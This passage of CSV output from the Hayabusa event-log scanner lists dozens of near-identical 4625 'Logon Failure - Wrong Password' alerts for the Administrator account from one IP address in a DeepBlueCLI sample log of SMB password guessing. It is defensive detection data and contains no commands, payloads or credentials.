NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: 